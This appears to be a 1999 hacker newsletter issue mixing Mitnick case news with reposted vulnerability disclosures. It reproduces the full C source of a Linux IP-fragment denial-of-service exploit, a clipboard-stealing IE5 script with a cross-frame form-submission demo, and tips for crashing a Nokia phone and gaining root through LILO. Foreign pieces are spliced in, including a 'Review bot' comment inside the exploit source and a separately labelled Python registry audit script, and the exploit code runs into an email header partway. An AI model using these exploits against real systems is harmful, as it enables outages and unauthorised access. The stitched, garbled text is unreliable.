According to Detective Senior Constable Mike Wheeler, Daniels admitted to having passwords to more than 350 accounts, but he had used only 37. The accounts were all for prepaid access from one of Australia's larger ISPs, and the customers affected were unaware that their accounts had been accessed.

"The ISP noticed inconsistencies and notified us," said Wheeler. "But let me say that this kind of problem is not restricted to just one ISP."

The WA man said he was given the passwords by another person, a juvenile who will be subject to a different court system. Daniels is set to appear in court tomorrow. He faces up to 12 months in jail or a fine of up to $4,000.

This article is located at http://newswire.com.au/9903/nfraud.htm

@HWA

04.0 Mitnick Updates
     ~~~~~~~~~~~~~~~

04.1 The Bumper Sticker Stays
     ~~~~~~~~~~~~~~~~~~~~~~~~

from Chaos theory
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2229344,00.html

After reflecting on the long, strange case of Kevin Mitnick, I've decided that the "Free Kevin" bumper sticker's not coming off my car-- not yet.

By Kevin Poulsen
March 22, 1999

After four long years in the house of many doors, 35-year-old Kevin Mitnick is ready to swallow a bitter pill, plead guilty to some of the twenty-five felonies on his indictment plate and accept a prison sentence a few months longer than the time he's already spent in stir.

But I'm not scraping the Free Kevin bumper sticker from my car any time soon.

The sticker stays because Tuesday's sealed plea agreement is now on the desk of Judge Mariana Pfaelzer, who may yet reject it as summarily as she refused to allow him the due process of a bail hearing.

The sticker also stays because Mitnick is still facing a dusty California state charge from the early '90s which threatens to flip him out of the frying pan of federal lockup and into the fire of the notorious Los Angeles County Jail-- better known as Hell. And even after his eventual release, Mitnick will spend up to three years in a technophobic virtual prison, barred from touching anything with a trace of silicon in it.

So the sticker will continue to adorn my bumper as a reminder of the end of an era, and the dawn of a new and harsh morning.
Kevin grew up to the extent that he did at a time when computers were still seen as mysterious and arcane, and exploring them was an innocent and joyful pastime for a few privileged youngsters. There was no talk of cyber-terrorism then; no suggestion that teenage technophiles were foreign operatives acting to overthrow the government. Kids who weren't old enough to drive were manipulating dizzying technology from their own bedrooms, and it was magic, pure and simple.

Kevin Mitnick was already a legendary magician when I got my first computer in the early '80s.

In today's Internet age, talentless teenaged taggers make national headlines by using pre-fab cracking tools to deface sitting-duck websites. So it takes some imagination to understand the genuine skill and artistry possessed by the likes of Kevin. He gained his knowledge from dumpsters and libraries and by tricking the guardians of technology with telephone con games. Applying that knowledge, doing things that weren't supposed to be possible, required creativity, resourcefulness, and tools that couldn't simply be downloaded.

He was the archetypal trickster, sharing the joy of discovery with friends and loved ones through ingenious pranks; his hapless victims usually ended up too impressed with the magic to be overly annoyed with the inconvenience.

While it seems inconceivable now, Mitnick didn't even cloak his efforts under a pseudonym. He was simply Kevin Mitnick. There was no reason to hide because what he was doing wasn't a crime. Nobody even minded much at first. It was all good clean fun.

The Playground's Closed

Then the world began to change, while Kevin remained the same. Communism died, and a notional hacker threat replaced the red menace as the enemy of everything good, decent, and American. The Internet took off in the early '90s, and pressure grew in Congress to make cyberspace safe for shopping.
Computers were no longer the billion-dollar brains controlling our lives; instead they were on our desks and in our homes, and no one liked the idea that people like Kevin might get into them and muck around.

Suddenly, the hacking that everyone around him thought was clever, amusing, and harmless during Mitnick's formative years became "computer fraud and abuse." Examining computer source code became "theft of proprietary information," and was equated to stealing money from a bank.

Before he knew it, Kevin was a "danger to the community," held without bail like a murderer. And his rights were given the treatment normally reserved for accused drug kingpins. He was soon in front of an openly hostile court, facing the full brunt of a federal prosecution, as he watched the seasons change through the semitransparent polymer slits that pass for jailhouse windows.

There was never any doubt that Kevin was guilty of at least some of the charges against him. There was never any doubt that he caused a lot of innocent people some serious hassles, and he needed to be slapped down. That was never really the point.

The "Free Kevin" bumper sticker is on my car because every day that he spends locked up raises the punitive bar of zero tolerance another notch.

Kevin Mitnick never damaged anything. He never stole a dime, never tried to profit from his efforts. He remained a laughing Peter Pan, while the world changed. I suspect he never really understood that his victims were no longer laughing along with him. He never lost his innocence.

The sticker is there as a reminder of the new paradigm that punishes dumb innocence more severely than true guilt, more harshly than fraud, theft, and robbery. The sticker is there because jail does a slow violence to a person, and Kevin Mitnick didn't deserve four years of that violence.

-=- -=-

04.2 Mitnick's Judgment Day at Hand
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by Douglas Thomas
9:00 a.m.
25.Mar.99.PST

LOS ANGELES -- Celebrity cracker Kevin Mitnick will appear before US District Court Judge Marianne Pfaelzer on Friday for what could be the last time.

Pfaelzer is scheduled to rule on a plea agreement jointly submitted by the government and defense team attorneys. Although neither side has discussed the details, a report leaked last week said Mitnick will plead guilty in exchange for a reduced sentence. The arrangement reportedly calls for Mitnick to spend at least an additional year in prison.

Mitnick, in custody since 1995, is charged with copying proprietary software from the computers of cellular telephone manufacturers. Over the years, he has grown to be the cause célèbre of hackers and crackers the world over.

Friday's scheduled appearance won't be the first time that Pfaelzer has considered a plea agreement from Mitnick. In 1989, Mitnick pleaded guilty to possessing unauthorized long-distance codes and copying security software from the Digital Equipment Corporation. Pfaelzer rejected a plea bargain in that case, and Mitnick spent a year in prison and six months in a halfway house.

If Pfaelzer accepts the current plea, it would mean the end of the federal indictment. Mitnick, however, still faces state charges stemming from a 1993 arrest. He is accused of fraudulently obtaining information from the Department of Motor Vehicles and faxing it to a copy shop in Los Angeles. If found guilty, Mitnick could face up to four years of additional prison time.

04.3 Why We Still Have to Free Kevin Mitnick...
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Update from www.kevinmitnick.com

Why We Still Have to Free Kevin Mitnick...
Assistant US Attorneys Defy Court Order Again
March 30, 1999

So Kevin Mitnick has pleaded guilty and reached an agreement with the federal authorities. The story is over. Thanks for participating. You can all go home now.

Not so fast.
If you've ever been robbed at gunpoint, you know the feeling of wanting to resist, but then giving up your valuables because you feared the consequences of what would happen if you resisted more vigorously. We all want to be heroes, but there comes a time when one needs to make a painful sacrifice in order to survive at all.

For more than four years, Kevin has held firm in prison, maintaining his innocence while trying to build a defense against the government's charges. The process of constructing such a case is a monumental one, even for highly paid defense attorneys. Now add to the mix the reality of being held captive in a federal prison that limits your "participation" in your defense to 20 minute collect phone calls and five hours per week in an inadequate law library, and you may begin to see what it was like.

Not there yet? Kevin's legal team was overworked and underfunded whereas the prosecution had unlimited resources and as much time as they needed, not to mention a compliant court that granted them every excuse for their manipulation of the facts and circumstances in this case.

Government Defiance of Court Order

Apparently unwilling to miss the opportunity to kick someone while they're down, government prosecutors David Schindler and Christopher Painter have walked through Alice's looking glass and turned the law on its head once again -- they have instructed the legal staff at the Metropolitan Detention Center (MDC) that Kevin will no longer need access to the laptop computer that Kevin has been using to prepare his defense; first for the trial, and now for the sentencing hearing scheduled for June 14, 1999.

Here are the circumstances: The legal staff at MDC supervises the prison's compliance with all legal matters affecting the prison. Kevin and his legal team convene in the attorney's visiting room at MDC to use a laptop computer to review the electronic evidence in Kevin's case.
Kevin is currently reviewing that evidence to counter the government's likely arguments in support of restitution requirements, which in turn are based upon fictional losses alleged to have been suffered by the alleged victims in this case.

Illegal Interference by Government

On Monday, March 29, Kevin met his legal team in the visiting room, where they were going to use the laptop computer to review evidence in preparation for Kevin's sentencing hearing on June 14. After waiting two hours, Kevin was informed that either Assistant U.S. Attorneys Schindler or Painter had incorrectly advised MDC Legal Staff that Kevin would "no longer be needing access to the computer," and consequently, Kevin would not be permitted access to the laptop in order to prepare for his sentencing hearing.

Defense Attorney Asserts Federal Court Order

One member of Kevin's defense team (standing in for attorney Don Randolph, Kevin's attorney of record in this case who is currently on vacation) asserted unequivocally that there is a federal court order in place with the MDC ordering -- not suggesting, but ordering -- the MDC to provide access to a laptop computer for Kevin and his legal staff.

Government's "Logic" Defies Justification

Logic would suggest that if government prosecutors object to a federal court order, it is their responsibility to petition the court for redress. The actions by the government are an attempt to turn the situation on its head, and constitute an apparent effort by AUSAs Schindler and/or Painter to unlawfully influence the behavior of the legal staff of MDC. In addition, they may have known that Kevin's lead defense attorney was scheduled to be out of town this week, thus increasing the likelihood that they would succeed in delaying Kevin's access to the evidence against him.
Prosecutors in Direct Violation of Court Order

Actions by AUSAs Schindler and/or Painter to manipulate legal staff at MDC are in direct violation of a federal court order by Judge Marianna Pfaelzer ordering the MDC to provide a laptop computer to Kevin Mitnick. Their actions are in violation of federal law, and at this difficult stage of Kevin's case, can have no other purpose than to interfere with Kevin's right to participate fully in his defense.

Call Your Congresspeople and Local Media

We urge you to call your United States Representative and Senator as well as your local news media to alert them to the apparently willful violation of a federal court order by sworn officers of the court. Calls to the office of Rep. Henry Waxman (D-CA) may prove especially helpful.

@HWA

04.4 Mitnick gets 46 months?
     ~~~~~~~~~~~~~~~~~~~~~~~

Mitnick Sentenced to 46 Months
by Douglas Thomas
3:00 a.m. 29.Mar.99.PST

The case is not closed on Kevin Mitnick, who was sentenced Friday to 46 months in prison after pleading guilty to seven counts of wire and computer fraud. The notorious cracker still faces California charges for computer fraud.

US District Judge Mariana Pfaelzer accepted Mitnick's guilty plea to five of 25 federal counts of fraud plus two counts of fraud in Northern California. No date has been set for a trial on Southern California charges, which stem from a 1993 arrest in which Mitnick was accused of fraudulently obtaining information from the Department of Motor Vehicles. If convicted of those charges, he could face an additional four years behind bars.

Friday's plea agreement set total damages of up to US$10 million. Prosecutors and defense lawyers could not reach agreement on restitution, which will be determined at Mitnick's sentencing hearing, scheduled for 14 June. Final motions and a pre-sentence investigation report are due by 1 June.
Mitnick has already spent 48 months in a Los Angeles detention center, including 14 months for violating conditions of his supervised release. He could be released to a halfway house this fall. But US Attorney David Schindler said Mitnick would be in prison "at least through next year."

Don Randolph, Mitnick's attorney, said his client was relieved to have his federal case resolved. In a prepared statement, Randolph said, "[Mitnick] can now see light at the end of the tunnel, and has a reasonable certainty that it is not another train approaching."

@HWA

05.0 Sesquipedalian.c 0 length connection resetting exploit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 24 Mar 1999 23:19:37 -0500
From: John McDonald
To: BUGTRAQ@netspace.org
Subject: DoS for Linux 2.1.89 - 2.2.3: 0 length fragment bug

Hi,

The recent release of the Linux 2.2.4 kernel fixed a remote denial of service problem in the IP fragment handling code. If you are running a Linux kernel between 2.1.89 and 2.2.3, it would probably be a good idea to get the latest version. In case that isn't feasible for you, I've included a patch in this post.

The impact of this problem is that a remote attacker can effectively disable a target's IP connectivity. However, for the attack to succeed, the attacker will have to deliver several thousand packets to the target, which can take up to several minutes. A quick exploit and the patch are appended to the end of this post.

The problem starts in ip_glue() in ip_fragment.c:

	/* Copy the data portions of all fragments into the new buffer. */
	fp = qp->fragments;
	count = qp->ihlen;
	while(fp) {
		if ((fp->len < 0) || ((count + fp->len) > skb->len))
			goto out_invalid;
		memcpy((ptr + fp->offset), fp->ptr, fp->len);
		if (count == qp->ihlen) {
			skb->dst = dst_clone(fp->skb->dst);
			skb->dev = fp->skb->dev;
		}
		count += fp->len;
		fp = fp->next;
	}

The problem in this code is that if you can get a fragment into the qp->fragments list that has a length of 0, and is the first fragment in the list, then the call to dst_clone() will happen an extra time. The first time through the loop, count will necessarily equal qp->ihlen, causing dst_clone() to be called. However, if fp->len happens to equal 0, then count += fp->len won't increase it, and the next time through the loop, count will still equal qp->ihlen.

dst_clone() increments a usage count on an element in the routing cache. Our 0 length fragment will cause this element in the cache to become stranded. The kernel will not free it when it does the garbage collection of the cache because it will think it is currently in use.
The other component of the problem is that the call to allocate a new entry in the routing cache does a check to see if the hashtable that comprises the cache is at a saturated state. If it is, it proceeds to do a garbage collection. If the number of entries in the cache, after this garbage collection, is still higher than the threshold, then dst_alloc() will fail. So, if we generate enough stranded entries in the routing cache (4096 in 2.2.3) via our malicious frags, then all further calls to dst_alloc will fail. We can get a 0 length fragment into the head of the list by doing the following: Send a fragment at offset 0, with a length of X, and IP_MF set. This creates our list. Send a 0 length fragment at offset 0, where the ip header length is equal to the ip total length, and IP_MF is set. This will be treated as coming before the fragment already in our list, because it has an offset equal to the offset of the existing fragment. It doesn't overlap any, because it's end is equal to the following fragment's offset. Send a fragment at offset X, with IP_MF not set. This will mark the end of our set of fragments. ip_done() will return true because it will see the first frag going from 0 to 0, the second going from 0 to X, and the third going from X to the end. Our fragments will get passed into ip_glue(). -horizon Here is the patch: --- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999 +++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999 @@ -17,6 +17,7 @@ * xxxx : Overlapfrag bug. * Ultima : ip_expire() kernel panic. * Bill Hawes : Frag accounting and evictor fixes. + * John McDonald : 0 length frag bug. */ #include 
@@ -357,7 +358,7 @@ fp = qp->fragments; count = qp->ihlen; while(fp) { - if ((fp->len < 0) || ((count + fp->len) > skb->len)) + if ((fp->len <= 0) || ((count + fp->len) > skb->len)) goto out_invalid; memcpy((ptr + fp->offset), fp->ptr, fp->len); if (count == qp->ihlen) { And here is the exploit: /* * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3 * * by horizon * * This sends a series of IP fragments such that a 0 length fragment is first * in the fragment list. This causes a reference count on the cached routing * information for that packet's originator to be incremented one extra time. * This makes it impossible for the kernel to deallocate the destination entry * and remove it from the cache. * * If we send enough fragments such that there are at least 4096 stranded * dst cache entries, then the target machine will no longer be able to * allocate new cache entries, and IP communication will be effectively * disabled. You will need to set the delay such that packets are not being * dropped, and you will probably need to let the program run for a few * minutes to have the full effect. This was written for OpenBSD and Linux. * * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing. 
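Review bot: the new "fp->len <= 0" test in ip_glue() only throws the datagram away at reassembly time, after the zero-length fragment has already been linked into qp->fragments, so I would also refuse such a fragment at the point where it is queued and keep this check as a backstop. The context line "if (count == qp->ihlen) {" is still being used to mean "this is the first fragment", and that inference is exactly what stopped holding when fp->len was 0; an explicit first-iteration flag, or setting skb->dst and skb->dev once before the loop, would not depend on every queued fragment having a positive length. A one-line comment next to the changed condition saying why a length of 0 is treated as invalid would also help, since the credit line added in the header comment does not say what the bug was.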
*/ #include #include #include #include #include #include #include #include struct my_ip_header { unsigned char ip_hl:4, /* header length */ ip_v:4; /* version */ unsigned char ip_tos; /* type of service */ unsigned short ip_len; /* total length */ unsigned short ip_id; /* identification */ unsigned short ip_off; /* fragment offset field */ #define IP_RF 0x8000 /* reserved fragment flag */ #define IP_DF 0x4000 /* dont fragment flag */ #define IP_MF 0x2000 /* more fragments flag */ #define IP_OFFMASK 0x1fff /* mask for fragmenting bits */ unsigned char ip_ttl; /* time to live */ unsigned char ip_p; /* protocol */ unsigned short ip_sum; /* checksum */ unsigned long ip_src, ip_dst; /* source and dest address */ }; struct my_udp_header { unsigned short uh_sport; unsigned short uh_dport; unsigned short uh_ulen; unsigned short uh_sum; }; #define IHLEN (sizeof (struct my_ip_header)) #define UHLEN (sizeof (struct my_udp_header)) #ifdef __OpenBSD__ #define EXTRA 8 #else #define EXTRA 0 #endif unsigned short checksum(unsigned short *data,unsigned short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } unsigned long resolve( char *hostname) { long result; struct hostent *hp; if ((result=inet_addr(hostname))==-1) { if ((hp=gethostbyname(hostname))==0) { fprintf(stderr,"Can't resolve target.\n"); exit(1); } bcopy(hp->h_addr,&result,4); } return result; } void usage(void) { fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n"); exit(0); } void sendem(int s, unsigned long source, unsigned long dest, unsigned short sport, unsigned short dport) { static char buffer[8192]; struct my_ip_header *ip; struct my_udp_header *udp; struct sockaddr_in sa; bzero(&sa,sizeof(struct sockaddr_in)); sa.sin_family=AF_INET; sa.sin_port=htons(sport); sa.sin_addr.s_addr=dest; bzero(buffer,IHLEN+32); ip=(struct my_ip_header *)buffer; 
udp=(struct my_udp_header *)&(buffer[IHLEN]); ip->ip_v = 4; ip->ip_hl = IHLEN >>2; ip->ip_tos = 0; ip->ip_id = htons(random() & 0xFFFF); ip->ip_ttl = 142; ip->ip_p = IPPROTO_UDP; ip->ip_src = source; ip->ip_dst = dest; udp->uh_sport = htons(sport); udp->uh_dport = htons(dport); udp->uh_ulen = htons(64-UHLEN); udp->uh_sum = 0; /* Our first fragment will have an offset of 0, and be 32 bytes long. This gets added as the only element in the fragment list. */ ip->ip_len = htons(IHLEN+32); ip->ip_off = htons(IP_MF); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN+32); if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } /* Our second fragment will have an offset of 0, and a 0 length. This gets added to the list before our previous fragment, making it first in line. */ ip->ip_len = htons(IHLEN); ip->ip_off = htons(IP_MF); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN); if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } /* Our third and final frag has an offset of 4 (32 bytes), and a length of 32 bytes. This passes our three frags up to ip_glue. 
*/ ip->ip_len = htons(IHLEN+32); ip->ip_off = htons(32/8); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN+32); if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } } int main(int argc, char **argv) { int sock; int on=1,i; unsigned long source, dest; unsigned short sport=53, dport=16384; int delay=20000, count=15000; if (argc<3) usage(); while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1) { switch (i) { case 's': sport=atoi(optarg); break; case 'd': dport=atoi(optarg); break; case 'n': count=atoi(optarg); break; case 'u': delay=atoi(optarg); break; default: usage(); } } argc-=optind; argv+=optind; source=resolve(argv[0]); dest=resolve(argv[1]); srandom(time((time_t)0)*getpid()); if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt: IP_HDRINCL"); exit(1); } fprintf(stdout,"\nStarting attack on %s ...",argv[1]); for (i=0; i To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: IE 5 security vulnerabilities Greetings, Microsoft delivers with IE 5 an Active X control called "DHTML Edit control Safe for Scripting for IE 5". In my opinion this control IS NOT SAFE AT ALL . I have found two vulnerabilities in this component : It makes public the clipboard and it allows cross-frame access. IE 4 is also affected as far as the control is a signed component and the browser will download it from MS site.(see below my comments about the CLSID). Demos are available at http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html I will briefly try to summarize the implications of this issues : 1- The hole makes public the clipboard. There is nothing new here. This is the third time I have reported this kind of vulnerability. MS says that this issue can be blocked by setting the "Allow paste operations via script" to 'prompt'. This security option is set to 'enable' by default (Medium security). 
IE 4 does not have this option and there is no way to avoid the exploit.

2- The hole allows cross-frame access

The first Internet browser security rule is : scripts can only interact with documents of the same domain and protocol. MS calls this the cross-frame security, Netscape refers to this rule as "The same origin security policy". DHTML Editor violates this rule and allows "transaction spoofing", a malicious script can submit transactions without the user's knowledge. I have asked my lawyer consultant about the issue and their response was : "Nobody can anymore use the IP address as a proof of an Internet crime against Internet Explorer users". MS says : "We don't see that this constitutes a security issue" .

3- Even if Microsoft fixes the hole the hole could exist forever.

Why ? As far as I know this is the first time a hole is "SIGNED". MS has released a "dhtmed.cab" file as an ActiveX component signed by Microsoft, anybody can distribute this file and the victim will only see a message telling him that the component is "Microsoft signed", I trust MS, everybody trusts MS, we will accept the ActiveX. MS has invented a very clever method to sign software, but there is not a way to revoke the signature.

4- There is something rare in the CLSID

Whenever an HTML page references a not registered CLSID nothing happens, just the object is not created. The "DHTML Edit Control" CLSID (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) is very special, Internet Explorer (4 and 5) will try to download the component from MS even if CODEBASE is not defined for the object. Is this a documented feature ? You can test this behaviour : unregister the component "dhtmle.ocx" (using regsvr32.exe) and then load the page http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html Why the browser decides to go to MS site ?
It only knows : clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A According to MS documentation a CODEBASE parameter must be made explicit in the OBJECT "object" to download the component. Any idea ?

Regards,
Cuartango

-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html

The DHTML Editor holes

Microsoft delivers with IE 5 an Active X control called DHTML edit control. The Microsoft Dynamic HTML (DHTML) Editing Component allows Web authors and application developers to add WYSIWYG DHTML editing capabilities to their Web sites and applications. The control has two versions : DHTML Edit Control for IE 5 and DHTML Edit Control Safe for Scripting for IE 5. The first one is of course marked as not safe for scripting and you will be warned if an HTML page contains this object.

The problem I have found : The second one is not safe at all. "DHTML Edit Control Safe for Scripting for IE 5" has in fact at least two security holes :

1- It makes public your clipboard (demo). According to Microsoft security rules access to Windows clipboard content is forbidden to Internet Explorer scripts unless the clipboard content was owned by the Explorer itself. This issue represents an important privacy leak. Workaround : Set security option "Allow paste operations via script" to "prompt".

2- It allows "cross-frame" access (demo). An HTML page or frame can read/write contents in frames owned by any domain, which is forbidden by cross-frame security rules. And still worse, it allows Transaction spoofing. This is a very serious danger. The Safe version of ActiveX is not able to navigate but it can SUBMIT FORMS which means that a malicious WEB page (or E-Mail) can perform transactions against any WEB site but YOU will be responsible because the transaction will have your own IP address.
IE 4 is also affected if you accept the download of the ActiveX (Signed by Microsoft) Last update March 24 Año del señor de 1999 ------------------------------------------------------------------------------- http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html DHTMLE Clipboard vulnerability

DHTML Editor Clipboard vulnerability

According to Microsoft security rules, access to Windows clipboard content is forbidden to Internet Explorer scripts unless the clipboard content was owned by the Explorer itself. If a script performs a "paste" operation over an input text box, the operation will succeed only if the data were copied to the clipboard from the Internet Explorer. The DHTMLE editor delivered with Internet Explorer 5 violates the clipboard security rule. The clipboard data can then be transferred to a form input box and posted to a malicious WEB.

To see the demo "copy" some text (from any application) and click the button below :

The box below  is a Input Text Area Box your clipboard text data should be here

The box below is "DHTML Edit Control Safe for Scripting for IE 5" 

The script making public the clipboard is very simple :

function getcb() {
    dh.DOM.body.innerHTML = "";          // clear the edit control's body
    dh.execCommand(5032);                // paste
    S1.value = dh.DOM.body.innerText;    // copy to text area
}


Created by Juan Carlos Garcia Cuartango


Last update Mar 24, Year of the Lord 1999
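
The workaround given for this hole, setting "Allow paste operations via script" to "prompt", can be verified from a registry export. The Python below is an added example, not code from Cuartango's page or from Microsoft: it parses .reg export text of the Internet Settings Zones key and reports, per zone, whether script paste is still enabled. The URL action number 1407 and the policy values 0/1/3 are taken from the Windows SDK header urlmon.h, not from this page, and the sample export is constructed.

```python
import re

# Assumption (from urlmon.h, not from this page): URL action 0x1407 is
# URLACTION_SCRIPT_PASTE, shown in the UI as "Allow paste operations via script".
SCRIPT_PASTE = "1407"
# URLPOLICY_ALLOW / URLPOLICY_QUERY / URLPOLICY_DISALLOW
POLICY = {0: "enable", 1: "prompt", 3: "disable"}
ZONES = {0: "My Computer", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}

SECTION = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
ZONE_KEY = re.compile(r"\\Internet Settings\\Zones\\(?P<zone>\d+)$", re.IGNORECASE)
DWORD = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<val>[0-9a-fA-F]{1,8})\s*$')


def parse_zone_actions(reg_text):
    """Return {zone_number: {value_name: int}} for every Zones\\<n> key
    found in .reg export text. Non-DWORD values are ignored."""
    zones, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        section = SECTION.match(line)
        if section:
            zone = ZONE_KEY.search(section.group("key"))
            current = zones.setdefault(int(zone.group("zone")), {}) if zone else None
            continue
        value = DWORD.match(line)
        if value and current is not None:
            current[value.group("name")] = int(value.group("val"), 16)
    return zones


def audit_script_paste(reg_text, zones_to_check=(3, 4)):
    """Report the script-paste setting for each zone of interest.

    A zone counts as exposed unless the export stores 'prompt' or 'disable'
    for it; a missing value means no explicit restriction is stored."""
    parsed = parse_zone_actions(reg_text)
    report = {}
    for zone in zones_to_check:
        raw = parsed.get(zone, {}).get(SCRIPT_PASTE)
        if raw is None:
            state = "not set"
        else:
            state = POLICY.get(raw, "unknown (0x%x)" % raw)
        report[zone] = {
            "zone": ZONES.get(zone, "zone %d" % zone),
            "state": state,
            "exposed": state not in ("prompt", "disable"),
        }
    return report


# Constructed sample: export of HKCU\...\Internet Settings\Zones
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"DisplayName"="Local intranet"
"1407"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1407"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"DisplayName"="Restricted sites"
"1407"=dword:00000003
"""

if __name__ == "__main__":
    for number, row in sorted(audit_script_paste(SAMPLE_EXPORT, (1, 2, 3, 4)).items()):
        flag = "EXPOSED" if row["exposed"] else "ok"
        print("zone %d (%s): %s -> %s" % (number, row["zone"], row["state"], flag))
```
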

-------------------------------------------------------------------------------

http://pages.whowhere.com/computers/cuartangojc/dhtmle3.html

DHTMLE vulnerabilities

The  DHTML Editor cross-frame hole


The box on the right is a DHTML Edit Control Safe for scripting.
It shows a form loaded from a different domain (www.angelfire.com).
Click the button below and I will fill the form and submit it.

Don't worry about the message displayed. It is only a demo.

A malicious script inserted in a WEB page or in an HTML formatted e-mail can submit transactions that will contain your IP address. (Imagine a script writing menaces in the White House guest book).


Created by Juan Carlos Garcia Cuartango


Last update March 23, Year of the Lord 1999


-------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 10:06:01 -0800
From: Harry Goodwin
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5 security vulnerabilities

I wanted to take a moment to thank Juan Carlos for bringing these issues to Microsoft's attention prior to posting the issues publicly. I also wanted to post Microsoft's response to the issues he's discovered.

1) Internet Explorer has customizable security settings in place for users who are concerned about allowing certain functionality. In this particular case, concerned users can easily block this behavior by checking either 'disable' or 'prompt' under "Allow paste operations via script" in the custom settings section in security zones. Using the IEAK, admins can also adjust the default setting for this option before distributing Internet Explorer to their users. The option is set to 'enable' by default to allow enhanced functionality.

2) Upon investigation we did find a cross domain security violation in the DHTML edit control which we will revoke, fix, and release.

3) Internet Explorer has a mechanism in place which allows Microsoft to release a .reg file to block ActiveX controls by changing a bit in the registry.

4) The following information found on MSDN (search on CodeBaseSearchPath) addresses this concern:

When Internet Component Download is called to download code, it traverses the Internet search path to look for the desired component. This path is a list of object store servers that will be queried every time components are downloaded using CoGetClassObjectFromURL. This way, even if an <OBJECT> tag in an HTML document does not specify a CODEBASE location to download code for an embedded OLE control, the Internet Component Download will still use the Internet search path to find the necessary code.

Internet search path syntax

The search path is specified in a string in the registry, under the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CodeBaseSearchPath. The value for this key is a string in the following format:

CodeBaseSearchPath = <URL1>; <URL2>; ... <URLm>; CODEBASE; <URLm+1>; ... <URLn-1>; <URLn>

In this format, each of URL1 through URLn is an absolute URL pointing to HTTP servers acting as "object stores". When processing a call to CoGetClassObjectFromURL, the Internet Component Download service will first try downloading the desired code from the locations URL1 through URLm, then try the location specified in the szCodeURL parameter (corresponding to the CODEBASE attribute in the <OBJECT> tag), and will finally try the locations specified in locations URLm+1 through URLn.

Note that if the CODEBASE keyword is not included in the key, calls to CoGetClassObjectFromURL will never check the szCodeURL location for downloading code. By removing the CODEBASE keyword from the key, corporate intranet administrators can effectively disable Internet Component Download for corporate users.

Thanks,
Harry

-------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 14:57:51 -0500
From: Phil Brass
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5 security vulnerabilities

> 4) The following information found on MSDN (search on
> CodeBaseSearchPath) addresses this concern: When Internet Component
> Download is called to download code, it traverses the Internet search path
> to
> look for the desired component. This path is a list of object store servers
> that will be queried every time components are downloaded using
> CoGetClassObjectFromURL. This way, even if an <OBJECT> tag in an HTML
> document does not specify a CODEBASE location to download code for an
> embedded OLE control, the Internet Component Download will still use the
> Internet search path to find the necessary code.
> Internet search path syntax
> The search path is specified in a string in the registry, under
> the key
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet
> Settings\CodeBaseSearchPath. The value for this key is a string in the
> following format:
> CodeBaseSearchPath = <URL1>; <URL2>; ... <URLm>; CODEBASE;
> <URLm+1>;
> ... <URLn-1>; <URLn>

On my NT4 SP3 box, permissions on this key are set to Everyone: Special Access, which includes set value. Therefore, anyone who is a user on this box can control where every other user downloads their controls from. Is that OK?

Phil

@HWA

07.0 QuickHacks and tips from ManicX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Quick Tricks Now

Just a few quick tips ( pulled all the other stuff, it's for your own good :þ )

Stuff Covered - Linux, Mobiles, Windows, BIOS,

System: Nokia 5110
Crash it
Send an SMS message full of 160 full stops to the phone
It will now beep and flash for 30 sec's or else just turn itself off

System: Linux (with lilo installed and local access)
Gives a root shell / root account
reboot your machine
on the lilo: prompt type in
what-linux-is-called-in-/etc/lilo.conf init=/bin/bash rw (i.e.
linux init=/bin/bash rw )
linux will now start to boot and stop after a few error messages
you now have a root shell (you will have very few commands) so type in the following
cat >> /etc/passwd
